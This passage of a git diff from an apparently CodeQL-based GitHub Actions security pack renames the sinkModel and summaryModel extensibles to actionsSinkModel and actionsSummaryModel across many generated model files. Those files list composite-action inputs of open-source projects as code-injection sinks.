["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 7b90ed20234..dda74b285da 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 62b31c2d3ef..4b144103f8f 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 427b75730ab..931658c0bb5 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 441913730fa..f2963217662 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index cbb2b43a2d8..1578e397369 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 2f981b5bd63..17c45e0d8ed 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 5d3d44e914c..4e26b872800 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7b41c1b2721..d5fa53d1bbb 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 505fbb22005..f90fb1c5e63 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 24223da3c89..d16c0792c6d 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index b529c0117f4..4d009c2d47d 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 6a46669f05d..afd875c2205 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index ec2f45f31db..680bbe27bcb 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 3574855be3c..ffe074d3dea 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 4ee1b878e54..e53a58412c9 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 8453a2d415c..a899f727e39 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index dc86b795981..0c7c2e1bded 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index ca9cc034d10..3d631e60dc3 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index b8aecfd5e3d..2f8710d2cbd 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index e7ac083da83..5490e62cdc9 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 5cac21a0751..0c6df201a1c 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 83e1345edf2..7d0b894f35d 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 8708afa3f3b..d85418c7a41 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index e4f1637603e..074cf066e37 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index f8b636c4636..c4497b59af8 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index f51d784d7c1..cc28e15a55b 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index ac6af801a0e..76fb41dadf1 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index fb676663019..b786a672140 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 503386ea3d4..236ac8f2cd2 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 6d48d32e9fa..64207dbca6a 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index ae6d1fcc1e8..46de0ff86c6 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 48b98225721..a07b223777b 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 14bfe57eb11..e3470982f53 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 4b04351ab90..87535288d26 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 755147a6f1a..28249c82428 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 12017671b4e..8d1bbce631f 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index e3028cc1bb3..3c5f85a6e79 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index ab112bb5ec0..01a552361ec 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 0d8ae4e102e..ab2e86ce868 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 44156ddd670..8d6dd73bfd9 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 693d456e4a5..a20cbb1e24d 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 5e3dffbb7f5..62785bef86b 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 5d782529f7f..9c10a54abc7 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index f7f845ac28f..4145ec19569 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index a58f033cc38..5b63c9fec06 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index aefece4bebd..f21389b08b0 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 5cbcfc01879..1a6f42c25f6 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 0712838a737..ea48b84310c 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 5ab14ba453b..4e953d695f8 100644 --- 